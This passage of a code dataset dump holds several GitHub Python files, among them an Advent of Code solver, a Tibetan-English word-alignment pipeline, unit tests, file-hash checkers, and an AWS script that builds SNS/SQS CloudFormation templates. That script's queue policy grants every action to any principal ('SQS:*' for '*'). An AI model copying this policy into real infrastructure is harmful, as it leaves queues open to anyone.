!= '':\n                candidates.remove(ongoing_job)\n\n        # Make each elf do their step\n        for i in range(num_workers):\n            if worker_status[i] != '':\n                to_do = worker_status[i]\n                prereq_index[to_do]['done'] += 1\n                if prereq_index[to_do]['done'] >= prereq_index[to_do]['length']:\n                    completed.add(to_do)\n                    del prereq_index[to_do]\n                    worker_status[i] = ''\n            elif len(candidates) > 0:\n                to_do = candidates.pop(0)\n                prereq_index[to_do]['done'] += 1\n                if prereq_index[to_do]['done'] >= prereq_index[to_do]['length']:\n                    completed.add(to_do)\n                    del prereq_index[to_do]\n                else:\n                    worker_status[i] = to_do\n\n        time_taken += 1\n\n    
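# the loop exits once every step is complete; time_taken is the part 2 answer\n    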
print(time_taken)\n","repo_name":"tkkuehn/aoc2018","sub_path":"day07/day7_2.py","file_name":"day7_2.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38748275228","text":"import pickle\n\ninput_file = 'model1.bin'\nwith open(input_file, 'rb') as f_in:\n model = pickle.load(f_in)\ninput_file = 'dv.bin'\nwith open(input_file, 'rb') as f_in:\n dv = pickle.load(f_in)\n\ncustomer = {\"contract\": \"two_year\", \"tenure\": 12, \"monthlycharges\": 19.7}\nX = dv.transform([customer])\ny_prediction = model.predict_proba(X)[0, 1]\nprint(y_prediction)","repo_name":"nicepeopleproject/ML","sub_path":"Week5Homework/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5532714747","text":"import glob\nimport json\nimport os\nimport string\nimport subprocess\nfrom collections import Counter\nfrom typing import Dict\n\nfrom botok import TSEK\n\nfrom word_aligner.data_processor import (\n clean_english_text,\n clean_tibetan_text,\n filter_for_english_dictionary_words,\n filter_for_tibetan_dictionary_words,\n)\nfrom word_aligner.tibetan_words_combiner import (\n load_tibetan_word_dictionary,\n merge_tibetan_compound_words,\n)\nfrom word_aligner.word_tokenizer import (\n load_botok_word_tokenizer,\n load_spacy_word_tokenizer,\n tokenize_english_with_named_entities,\n tokenize_english_with_spacy,\n tokenize_tibetan_with_botok,\n)\n\n\ndef tokenize_and_merge_files(\n split_affix=True,\n tibetan_lemma=False,\n combine_tibetan_compound_words=False,\n english_lemma=False,\n combine_english_compound_words=False,\n num_files_to_train=1,\n):\n # Paths\n data_dir = \"data\"\n input_dir = os.path.join(data_dir, \"input\")\n english_out_file = os.path.join(data_dir, \"english.txt\")\n tibetan_out_file = os.path.join(data_dir, \"tibetan.txt\")\n\n botok_tokenizer_obj = load_botok_word_tokenizer()\n spacy_tokenizer_obj = load_spacy_word_tokenizer()\n TIBETAN_WORD_DICTIONARY = load_tibetan_word_dictionary()\n\n # Updated merging code with tokenization and ensuring non-empty pairs\n with open(english_out_file, \"w\", encoding=\"utf-8\") as english_out, open(\n tibetan_out_file, \"w\", encoding=\"utf-8\"\n ) as tibetan_out:\n for subdir in os.listdir(input_dir):\n\n full_subdir_path = os.path.join(input_dir, subdir)\n if os.path.isdir(full_subdir_path):\n files_in_subdir = os.listdir(full_subdir_path)\n english_files = [f for f in files_in_subdir if f.endswith(\"-en.txt\")]\n tibetan_files = [f for f in files_in_subdir if f.endswith(\"-bo.txt\")]\n\n english_files = sorted(english_files)\n tibetan_files = sorted(tibetan_files)\n\n if len(english_files) != len(tibetan_files):\n print(\n f\"Warning: Mismatch in number of files in {full_subdir_path}. 
Skipping this folder.\"\n )\n continue\n\n file_count = 1\n for english_file, tibetan_file in zip(\n sorted(english_files), sorted(tibetan_files)\n ):\n with open(\n os.path.join(full_subdir_path, english_file), encoding=\"utf-8\"\n ) as eng, open(\n os.path.join(full_subdir_path, tibetan_file), encoding=\"utf-8\"\n ) as bo:\n en_lines = eng.readlines()\n bo_lines = bo.readlines()\n if len(en_lines) != len(bo_lines):\n continue\n print(f\"Tokenizing file [{file_count}/{num_files_to_train}]\")\n tokenized_english_lines = \"\"\n tokenized_tibetan_lines = \"\"\n for en_line, bo_line in zip(en_lines, bo_lines):\n if combine_english_compound_words:\n en_line = tokenize_english_with_named_entities(\n spacy_tokenizer_obj,\n clean_english_text(en_line),\n english_lemma,\n )\n else:\n en_line = tokenize_english_with_spacy(\n spacy_tokenizer_obj,\n clean_english_text(en_line),\n english_lemma,\n )\n bo_line = tokenize_tibetan_with_botok(\n botok_tokenizer_obj,\n clean_tibetan_text(bo_line),\n split_affix,\n tibetan_lemma,\n )\n if combine_tibetan_compound_words:\n bo_line = merge_tibetan_compound_words(\n TIBETAN_WORD_DICTIONARY, bo_line\n )\n\n if en_line and bo_line:\n tokenized_english_lines += en_line + \"\\n\"\n tokenized_tibetan_lines += bo_line + \"\\n\"\n\n english_out.write(tokenized_english_lines)\n tibetan_out.write(tokenized_tibetan_lines)\n if file_count >= num_files_to_train:\n break\n file_count += 1\n\n print(f\"Data merged into {english_out_file} and {tibetan_out_file}.\")\n\n\n# Function to read vcb files and return a dictionary\ndef read_vcb(vcb_file): # noqa\n vocabulary = {}\n with open(vcb_file, encoding=\"utf-8\") as f:\n for line in f:\n parts = line.strip().split()\n index = int(parts[0])\n word = parts[1]\n vocabulary[index] = word\n return vocabulary\n\n\ndef group_consecutive_indices(indices):\n \"\"\"Group consecutive indices.\"\"\"\n if not indices:\n return []\n\n groups = []\n current_group = [indices[0]]\n\n for i in range(1, len(indices)):\n if indices[i] == indices[i - 1] + 1:\n current_group.append(indices[i])\n else:\n groups.append(current_group)\n current_group = [indices[i]]\n groups.append(current_group)\n\n return groups\n\n\ndef execute_mgiza(threshold_frequency=1, is_source_file_english=True):\n\n # Set paths\n data_dir = \"data\"\n source_path = os.path.join(data_dir, \"english\")\n target_path = os.path.join(data_dir, \"tibetan\")\n\n if not is_source_file_english:\n source_path = os.path.join(data_dir, \"tibetan\")\n target_path = os.path.join(data_dir, \"english\")\n\n out_file = os.path.join(data_dir, \"aligned_words.txt\")\n\n # Convert plain text data to the snt format expected by mgiza++\n subprocess.run([\"plain2snt\", source_path + \".txt\", target_path + \".txt\"])\n\n # Set paths for co-occurrence files\n cooc_file_source_target = os.path.join(data_dir, \"source-target.cooc\")\n cooc_file_target_source = os.path.join(data_dir, \"target-source.cooc\")\n\n # Generate co-occurrence files using snt2cooc\n subprocess.run(\n [\n \"snt2cooc\",\n cooc_file_source_target,\n source_path + \".vcb\",\n target_path + \".vcb\",\n source_path + \"_\" + target_path.split(\"/\")[-1] + \".snt\",\n ]\n )\n subprocess.run(\n [\n \"snt2cooc\",\n cooc_file_target_source,\n target_path + \".vcb\",\n source_path + \".vcb\",\n target_path + \"_\" + source_path.split(\"/\")[-1] + \".snt\",\n ]\n )\n\n # Run mgiza with co-occurrence files\n subprocess.run(\n [\n \"mgiza\",\n \"-S\",\n source_path + \".vcb\",\n \"-T\",\n target_path + \".vcb\",\n \"-C\",\n source_path + 
\"_\" + target_path.split(\"/\")[-1] + \".snt\",\n \"-o\",\n os.path.join(data_dir, \"alignment\"),\n \"-CoocurrenceFile\",\n cooc_file_source_target,\n ]\n )\n\n # Read vocabularies\n src_vocabulary = read_vcb(source_path + \".vcb\")\n tgt_vocabulary = read_vcb(target_path + \".vcb\")\n\n # Check that vocabularies are correctly read\n print(f\"First 5 source vocab entries: {list(src_vocabulary.items())[:5]}\")\n print(f\"First 5 target vocab entries: {list(tgt_vocabulary.items())[:5]}\")\n\n # Define the word_alignments dictionary\n word_alignments: Dict = {} # noqa\n\n # Extract word alignments from the alignment files\n alignment_files = glob.glob(os.path.join(data_dir, \"alignment.A3.final.part*\"))\n print(f\"Found {len(alignment_files)} alignment files.\")\n\n # Loop over alignment files\n for alignment_file in alignment_files:\n print(f\"Processing {alignment_file}\")\n with open(alignment_file, encoding=\"utf-8\") as af:\n lines = af.readlines()\n for i in range(1, len(lines), 3):\n source_tokens = lines[i].strip().split()\n\n # Extract the part of the line that contains the alignments\n alignment_info = lines[i + 1].strip().split(\"NULL\")[1]\n\n # Split the line based on closing brace to get individual alignments\n alignments = alignment_info.split(\"}\")\n for align in alignments:\n if \"{\" not in align:\n continue\n target_word = align.split(\"{\")[0].strip().strip(string.punctuation)\n indices = [int(idx) for idx in align.split(\"{\")[1].split()]\n\n grouped_indices = group_consecutive_indices(indices)\n # join words formed by word alignment with '*' sign\n grouped_source_words = [\n \"*\".join(source_tokens[idx - 1] for idx in group)\n for group in grouped_indices\n ]\n\n if target_word not in word_alignments:\n word_alignments[target_word] = []\n word_alignments[target_word].extend(grouped_source_words)\n\n # Debug print to check how many alignments have been captured after processing each file\n print(\n f\"Number of alignments captured after processing {alignment_file}: {len(word_alignments)}\"\n )\n\n # Cleaning the words before writing to file\n\n if is_source_file_english:\n word_alignments = {\n filter_for_english_dictionary_words(word): [\n filter_for_tibetan_dictionary_words(phrase)\n for phrase in phrases\n if filter_for_tibetan_dictionary_words(phrase) != \"\"\n ]\n for word, phrases in word_alignments.items()\n if filter_for_english_dictionary_words(word) != \"\"\n }\n # Add tsek to the end of tibetan words for key\n word_alignments = {\n word: [\n phrase if phrase.endswith(TSEK) else phrase + TSEK for phrase in phrases\n ]\n for word, phrases in word_alignments.items()\n }\n\n else:\n word_alignments = {\n filter_for_tibetan_dictionary_words(word): [\n filter_for_english_dictionary_words(phrase)\n for phrase in phrases\n if filter_for_english_dictionary_words(phrase) != \"\"\n ]\n for word, phrases in word_alignments.items()\n if filter_for_tibetan_dictionary_words(word) != \"\"\n }\n # Add tsek to the end of tibetan words for key\n keys_to_remove = []\n newly_added_word_alignment = {}\n for tibetan_word in word_alignments.keys():\n if not tibetan_word.endswith(TSEK):\n keys_to_remove.append(tibetan_word)\n tibetan_word_with_tsek = tibetan_word + TSEK\n if tibetan_word_with_tsek in word_alignments:\n word_alignments[tibetan_word_with_tsek].extend(\n word_alignments[tibetan_word]\n )\n\n else:\n newly_added_word_alignment[\n tibetan_word_with_tsek\n ] = word_alignments[tibetan_word]\n # Remove the old keys\n for key in keys_to_remove:\n del word_alignments[key]\n 
word_alignments.update(newly_added_word_alignment)\n\n # Process word alignments to get unique strings with frequencies and order them\n filtered_word_alignments = {}\n filtered_word_alignments_json = {}\n for target_word, source_phrases in word_alignments.items():\n counter = Counter(source_phrases)\n\n # Filter phrases based on the threshold\n filtered_phrases = {\n phrase: count\n for phrase, count in counter.items()\n if count >= threshold_frequency\n }\n\n if not filtered_phrases:\n continue\n ordered_phrases = sorted(\n filtered_phrases.items(), key=lambda x: x[1], reverse=True\n )\n filtered_word_alignments[target_word] = [\n f\"{phrase}_{count}\" for phrase, count in ordered_phrases\n ]\n filtered_word_alignments_json[target_word] = [\n {\n \"translation\": phrase.replace(\"*\", \" \").replace(\"+\", \" \"),\n \"frequency\": count,\n }\n for phrase, count in ordered_phrases\n ]\n\n filtered_word_alignments_sorted_keys = sorted(\n k.replace(\"+\", \" \") for k in filtered_word_alignments_json.keys()\n )\n filtered_word_alignments_json = {\n new_key: filtered_word_alignments_json[old_key]\n for new_key, old_key in zip(\n filtered_word_alignments_sorted_keys,\n sorted(filtered_word_alignments_json.keys()),\n )\n }\n json_file_path = os.path.join(data_dir, \"aligned_words.json\")\n\n # Writing the dictionary to a JSON file\n with open(json_file_path, \"w\", encoding=\"utf-8\") as json_file:\n # The `indent` parameter is optional, used for pretty-printing\n json.dump(\n filtered_word_alignments_json, json_file, ensure_ascii=False, indent=4\n )\n\n print(f\"Data has been written to {json_file_path}\")\n # Write results to output file\n print(\"Writing to aligned_words.txt...\")\n with open(out_file, \"w\", encoding=\"utf-8\") as out:\n for target_word in sorted(filtered_word_alignments.keys()):\n source_words = \", \".join(filtered_word_alignments[target_word])\n out.write(f\"{target_word}: {source_words}\\n\")\n\n print(\"Writing complete.\")\n print(f\"Word alignments saved to {out_file}\")\n\n\nif __name__ == \"__main__\":\n tokenize_and_merge_files()\n execute_mgiza()\n","repo_name":"OpenPecha/word-aligner","sub_path":"src/word_aligner/mgiza_word_aligner.py","file_name":"mgiza_word_aligner.py","file_ext":"py","file_size_in_byte":14023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13253173370","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ntest_python.py\n\nTest suite for zcomx/modules/python.py\n\"\"\"\nimport unittest\nfrom applications.zcomx.modules.python import (\n List,\n from_dict_by_keys,\n)\nfrom applications.zcomx.modules.tests.runner import LocalTestCase\n# pylint: disable=missing-docstring\n\n\nclass TestList(LocalTestCase):\n\n def test_parent____init__(self):\n integers = List([1, 2, 3])\n self.assertEqual(len(integers), 3)\n\n def test__reshape(self):\n integers = List(list(range(0, 10)))\n self.assertEqual(len(integers), 10)\n\n tests = [\n # (shape, expect)\n ((2, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((None, None), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\n ((None, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((None, 3), [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]),\n ((2, None), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((3, None), [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]),\n ((2, 4), [[0, 1, 2, 3], [4, 5, 6, 7]]),\n ((1, 5), [[0, 1, 2, 3, 4]]),\n ((3, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((2, 6), [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9]]),\n ]\n\n for t in tests:\n 
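# reshape(t[0]) should produce the t[1] nested structure\n            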
self.assertEqual(integers.reshape(t[0]), t[1])\n\n\nclass TestFunctions(LocalTestCase):\n\n def test__from_dict_by_keys(self):\n data = {\n 'a': {\n 'aa': {\n 'aaa': 111,\n 'aab': 112,\n },\n 'ab': {\n 'aba': 121,\n 'abb': 122,\n },\n },\n 'b': {\n 'ba': {\n 'baa': 211,\n 'bab': 212,\n },\n 'bb': {\n 'bba': 221,\n 'bbb': 222,\n },\n },\n }\n\n tests = [\n # (map_list, expect)\n ([], data),\n (\n ['a'],\n {\n 'aa': {'aaa': 111, 'aab': 112},\n 'ab': {'aba': 121, 'abb': 122},\n }\n ),\n (['a', 'aa'], {'aaa': 111, 'aab': 112}),\n (['a', 'aa', 'aaa'], 111),\n (['b', 'bb', 'bbb'], 222),\n (['c'], KeyError),\n (['a', 'ac'], KeyError),\n (['a', 'aa', 'aac'], KeyError),\n ]\n for t in tests:\n if t[1] == KeyError:\n self.assertRaises(\n t[1], from_dict_by_keys, data, t[0])\n else:\n self.assertEqual(\n from_dict_by_keys(data, t[0]),\n t[1]\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zcomx/zco.mx","sub_path":"applications/zcomx/tests/test_python.py","file_name":"test_python.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11630535700","text":"# !/usr/bin/python3\nimport sys\nimport boto3\nimport json\nimport botocore\nimport re\nfrom botocore.exceptions import ClientError\n\ntry:\n Environment = sys.argv[1]\n QueueName = sys.argv[2]\n DeadLetterQueueName = sys.argv[3]\n MaxReceiveCount = sys.argv[4]\n LOB = sys.argv[5]\n REF_ID = sys.argv[6] # For the parameter JIRA_ID\n ApplicationName = sys.argv[7]\n SNSTopicName = sys.argv[8]\n SNSSubscriptionRequired = sys.argv[9]\n QueueType = sys.argv[10]\n # If QueueType is FIFO, then set QueueType to true else false\n if QueueType == \"FIFO\":\n QueueType = True\n else:\n QueueType = False\n VisibilityTimeout = sys.argv[11]\n MessageRetentionPeriod = sys.argv[12]\n MaximumMessageSize = sys.argv[13]\n DelaySeconds = sys.argv[14]\n ReceiveMessageWaitTimeSeconds = sys.argv[15]\n RawMessageDelivery = sys.argv[16]\n Stackname = sys.argv[17]\nexcept IndexError:\n print(\"Please provide all the required arguments: Environment, QueueName, DeadLetterQueueName, MaxReceiveCount, LOB, REF_ID, ApplicationName, SNSTopicName, SNSSubscriptionRequired, QueueType, VisibilityTimeout, MessageRetentionPeriod, MaximumMessageSize, DelaySeconds,RawMessageDelivery, Stackname\")\n sys.exit(1)\n\nprint(f\"Environment: {Environment}\")\nprint(f\"QueueName: {QueueName}\")\nprint(f\"DeadLetterQueueName: {DeadLetterQueueName}\")\nprint(f\"MaxReceiveCount: {MaxReceiveCount}\")\nprint(f\"LOB: {LOB}\")\nprint(f\"REF_ID: {REF_ID}\")\nprint(f\"ApplicationName: {ApplicationName}\")\nprint(f\"SNSTopicName: {SNSTopicName}\")\nprint(f\"SNSSubscriptionRequired: {SNSSubscriptionRequired}\")\nprint(f\"QueueType: {QueueType}\")\nprint(f\"VisibilityTimeout: {VisibilityTimeout}\")\nprint(f\"MessageRetentionPeriod: {MessageRetentionPeriod}\")\nprint(f\"MaximumMessageSize: {MaximumMessageSize}\")\nprint(f\"DelaySeconds: {DelaySeconds}\")\nprint(f\"ReceiveMessageWaitTimeSeconds: {ReceiveMessageWaitTimeSeconds}\")\nprint(f\"RawMessageDelivery: {RawMessageDelivery}\")\nprint(f\"Stackname: {Stackname}\")\n\n# Now we create the CloudFormation stack\ncloudformation = boto3.client('cloudformation')\n\n# Print list of stacks containing SNS-SQS in the name\ntry:\n for stack in cloudformation.list_stacks()['StackSummaries']:\n if \"SNS-SQS\" in stack['StackName']:\n print(stack['StackName'])\nexcept KeyError:\n print(\"No stacks found with SNS-SQS in the name\")\n pass\n\n# Get the 
template using the stack name\ntry:\n template_cft = cloudformation.get_template(StackName=Stackname)\nexcept botocore.exceptions.ClientError as e:\n print(e.response['Error']['Message'])\n pass\n\n# Get the Resources section of the template\ntry:\n template = dict(template_cft['TemplateBody'])\n # print(template)\n \nexcept Exception:\n template = {\n \"AWSTemplateFormatVersion\": \"2010-09-09\",\n \"Description\": \"Template for creating SNS Topic and SQS Queue\",\n \"Parameters\": {},\n \"Mappings\": {},\n \"Conditions\": {},\n \"Resources\": {}\n }\n # print(template['Resources'])\n\n# Find the largest number in the SQSQUEUE resource name\n\n# numlist = []\n# for resource in template['Resources']:\n# num = re.findall(r'\\d+', resource)\n# if num:\n# numlist.append(num)\n# try:\n# if len(DeadLetterQueueName) == 0:\n# count = int(max(numlist)[0]) + 1\n# else:\n# count = int(max(numlist)[0]) + 2\n# except ValueError:\n# count = 1\n\nsqsQueueCount = 0\nsnsTopicCount = 0\n\n# Find the number following \"SQSQUEUE\" and \"SNSTOPIC\" uder Resources\nfor resource in template['Resources']:\n if \"SQSQUEUE\" in resource:\n # Find the number following \"SQSQUEUE\"\n sqsQueueCount = int(re.findall(r'\\d+', resource)[0])\n if \"SNSTOPIC\" in resource:\n # Find the number following \"SNSTOPIC\"\n snsTopicCount = int(re.findall(r'\\d+', resource)[0])\n\nsqsQueueCount += 2\nsnsTopicCount += 1\nprint(f\"SQSQUEUE count: {sqsQueueCount}\")\nprint(f\"SNSTOPIC count: {snsTopicCount}\")\n\nresources_source_queue = {}\nresources_dead_letter_queue = {}\nresources_queue_policy = {}\nresources_sns_topic = {}\nresources_sns_subscription = {}\n\nsqs = boto3.client('sqs')\nsns = boto3.client('sns')\nqueue_arn = None\n\n# If Queue already exists, then we print the Queue URL and exit\ntry:\n for url in sqs.list_queues()['QueueUrls']:\n # Need to check if the exact QueueName exists\n if QueueName == url.split('/')[-1]:\n queue_attributes = sqs.get_queue_attributes(\n QueueUrl=url,\n AttributeNames=['QueueArn']\n )\n queue_arn = queue_attributes['Attributes']['QueueArn']\n print(f\"Queue already exists!\")\n print(f\"Queue URL: {url}\")\n print(f\"Queue ARN: {queue_arn}\")\n sys.exit(0)\nexcept KeyError:\n print(\"Queue does not exist. 
Creating Queue...\")\n pass\n\nsnsList = []\nif SNSTopicName != \"\":\n for topic in sns.list_topics()['Topics']:\n snsList.append(topic['TopicArn'].split(':')[-1])\n\nfor resource in template['Resources']:\n if \"SNSTOPIC\" in resource:\n if template['Resources'][f\"{resource}\"][\"Properties\"]['TopicName']==SNSTopicName:\n existing_SNSTOPIC = resource\n\nif SNSTopicName != \"\" and SNSSubscriptionRequired == \"True\":\n if SNSTopicName in snsList:\n print(f\"SNS Topic already exists!\")\n resources_sns_subscription = {\n f\"SNSSUBSCRIPTION{snsTopicCount}SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SNS::Subscription\",\n \"Properties\": {\n \"TopicArn\": {\n \"Ref\": existing_SNSTOPIC\n },\n \"Endpoint\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount}\",\n \"Arn\"\n ]\n },\n \"Protocol\": \"sqs\",\n \"RawMessageDelivery\": RawMessageDelivery\n }\n }\n }\n\n else:\n print(f\"Creating SNS Topic and Subscription...\")\n resources_sns_topic = {\n f\"SNSTOPIC{snsTopicCount}\": {\n \"Type\": \"AWS::SNS::Topic\",\n \"Properties\": {\n \"TopicName\": SNSTopicName,\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n {\n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n\n resources_sns_subscription = {\n f\"SNSSUBSCRIPTION{snsTopicCount}SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SNS::Subscription\",\n \"Properties\": {\n \"TopicArn\": {\n \"Ref\": f\"SNSTOPIC{snsTopicCount}\"\n },\n \"Endpoint\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount}\",\n \"Arn\"\n ]\n },\n \"Protocol\": \"sqs\",\n \"RawMessageDelivery\": RawMessageDelivery\n }\n }\n }\n\nelif SNSTopicName != \"\" and SNSSubscriptionRequired == \"False\":\n if SNSTopicName in snsList:\n print(f\"SNS Topic already exists!\")\n resources_sns_subscription = None\n resources_sns_topic = None\n pass\n else:\n print(f\"Creating SNS Topic...\")\n resources_sns_topic = {\n f\"SNSTOPIC{snsTopicCount}\": {\n \"Type\": \"AWS::SNS::Topic\",\n \"Properties\": {\n \"TopicName\": SNSTopicName,\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n {\n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n resources_sns_subscription = None\n\nelse:\n resources_sns_topic = None\n resources_sns_subscription = None\n\nif len(DeadLetterQueueName) != 0:\n resources_dead_letter_queue = {\n f\"SQSQUEUE{sqsQueueCount-1}\": {\n \"Type\": \"AWS::SQS::Queue\",\n \"Properties\": {\n \"QueueName\": DeadLetterQueueName\n }\n }\n }\nelse:\n resources_dead_letter_queue = None\n\nif QueueName != \"\" and len(DeadLetterQueueName) != 0:\n # print(\"Both QueueName and DeadLetterQueueName are provided\")\n resources_source_queue = {\n f\"SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SQS::Queue\",\n \"DependsOn\": f\"SQSQUEUE{sqsQueueCount-1}\",\n \"Properties\": {\n \"QueueName\": QueueName,\n # \"FifoQueue\": QueueType,\n \"VisibilityTimeout\" : VisibilityTimeout,\n \"DelaySeconds\": DelaySeconds,\n \"MessageRetentionPeriod\": MessageRetentionPeriod,\n \"MaximumMessageSize\": MaximumMessageSize,\n \"ReceiveMessageWaitTimeSeconds\": ReceiveMessageWaitTimeSeconds,\n \"RedrivePolicy\": {\n \"deadLetterTargetArn\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount-1}\",\n \"Arn\"\n ]\n },\n \"maxReceiveCount\": MaxReceiveCount\n },\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n { \n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n 
\"Value\": ApplicationName\n }\n ]\n }\n }\n }\n\nelif QueueName != \"\" and len(DeadLetterQueueName) == 0:\n # print(\"Only Source QueueName is provided\")\n resources_source_queue = {\n f\"SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SQS::Queue\",\n \"Properties\": {\n \"QueueName\": QueueName,\n # \"FifoQueue\": QueueType,\n \"VisibilityTimeout\" : VisibilityTimeout,\n \"DelaySeconds\": DelaySeconds,\n \"MessageRetentionPeriod\": MessageRetentionPeriod,\n \"MaximumMessageSize\": MaximumMessageSize,\n \"ReceiveMessageWaitTimeSeconds\": ReceiveMessageWaitTimeSeconds,\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n { \n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n\nelse:\n resources_source_queue = None\n\nif QueueName != \"\":\n resources_queue_policy = {\n f\"SQSQUEUE{sqsQueueCount}POLICY\": {\n \"Type\": \"AWS::SQS::QueuePolicy\",\n \"Properties\": {\n \"Queues\": [\n {\n \"Ref\": f\"SQSQUEUE{sqsQueueCount}\"\n }\n ],\n \"PolicyDocument\": {\n \"Statement\": [\n {\n \"Action\": \"SQS:*\",\n \"Effect\": \"Allow\",\n \"Principal\": \"*\",\n \"Resource\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount}\",\n \"Arn\"\n ]\n }\n }\n ]\n }\n }\n }\n }\nelse:\n resources_queue_policy = None\n\n\nif resources_sns_topic != None:\n template[\"Resources\"].update(resources_sns_topic)\n\nif resources_dead_letter_queue != None:\n template[\"Resources\"].update(resources_dead_letter_queue)\n\nif resources_source_queue != None:\n template[\"Resources\"].update(resources_source_queue)\n\nif resources_queue_policy != None:\n template[\"Resources\"].update(resources_queue_policy)\n\nif resources_sns_subscription != None:\n template[\"Resources\"].update(resources_sns_subscription)\n\nprint(json.dumps(template, indent=4))\n\n# try:\n# update_stack = cloudformation.update_stack(\n# StackName=Stackname,\n# TemplateBody=json.dumps(template, indent=4),\n# )\n# print(f\"Updating the stack {Stackname}\")\n# except botocore.exceptions.ClientError as e:\n# create_stack = cloudformation.create_stack(\n# StackName=Stackname,\n# TemplateBody=json.dumps(template, indent=4),\n# )\n# print(f\"Creating New Stack {Stackname}\")\n","repo_name":"Jks08/AWSLearn","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":13380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11483527370","text":"import hashlib\nimport pdb\nimport time\n\ndef md5(fname, blocksize=65536):\n \"\"\"\n Performs md5 on file\n Parameters\n ----------\n fname : str\n path to the file\n blocksize : int\n 4096 or 65536\n Returns\n -------\n\n \"\"\"\n\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(blocksize), b\"\"):\n hash_md5.update(chunk)\n\n return hash_md5.hexdigest()\n\n\ndef check_copied_file_identical(original_fpath, copied_fpath, verbose=True):\n \"\"\"\n Checks if two files are identical (and not unintentionally modified through eg. 
a copy and paste process)\n Parameters\n ----------\n original_fpath : str\n path to the original file\n copied_fpath : str\n path to the new copied file\n\n Returns\n -------\n file_is_identical : bool\n 0 : file is different\n 1 : file is identical\n \"\"\"\n\n if verbose:\n print('Calculating md5 for %s' % original_fpath)\n start_time = time.time()\n original_md5 = md5(original_fpath)\n\n if verbose:\n end_time = time.time()\n print('Elapsed time %.3f' % (end_time - start_time))\n\n if verbose:\n print('Calculating md5 for %s' % copied_fpath)\n start_time = time.time()\n\n copied_md5 = md5(copied_fpath)\n\n if verbose:\n end_time = time.time()\n print('Elapsed time %.3f' % (end_time - start_time))\n\n file_is_identical = (original_md5 == copied_md5)\n\n if verbose:\n if file_is_identical:\n print('Files are identical')\n else:\n print('Files are different')\n\n return file_is_identical\n\n\n\ndef main():\n\n\n original_fpath = '/home/timothysit/Desktop/2022-01-18_6_AV002_frontCam.mj2'\n copied_fpath = '/run/user/1000/gvfs/smb-share:server=zinu.local,share=subjects/AV002/2022-01-18/6/2022-01-18_6_AV002_frontCam.mj2'\n\n file_is_identical = check_copied_file_identical(original_fpath, copied_fpath)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cortex-lab/PinkRigs","sub_path":"Analysis/pyutils/checkFileIntegrity.py","file_name":"checkFileIntegrity.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4704294278","text":"# -*- coding: utf-8 -*-\n\nimport hashlib\nimport os\nimport shutil\nfrom stat import ST_SIZE, ST_CTIME\n\n\nCHUNKSIZE = 4096\nINNER_ENCODING = 'utf-8'\nREWIND = object()\nCLOSE = object()\n\n\nremove_punctuation_map = dict((\n ord(char), None) for char in '''\\/\\'\\\"*?:;\"<>|'''\n)\n_windows_device_files = (\n 'CON', 'AUX', 'COM1', 'COM2', 'COM3',\n 'COM4', 'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')\n\n\ndef stat_file(path):\n stats = os.stat(path)\n return stats[ST_SIZE], stats[ST_CTIME]\n\n\ndef chunk_reader(fobj, chunk_size=CHUNKSIZE):\n \"\"\"Generator that reads a file in chunks of bytes\n \"\"\"\n while True:\n chunk = fobj.read(chunk_size)\n if not chunk:\n return\n yield chunk\n\n\nclass FileIterable(object):\n\n def __init__(self, filename, filepath):\n self.filename = filename\n self.filepath = filepath\n\n def __iter__(self):\n with open(self.filepath, 'rb') as fd:\n for chunk in chunk_reader(fd):\n yield chunk\n\n\ndef digest(fobj, hash=hashlib.sha1):\n hashobj = hash()\n size = 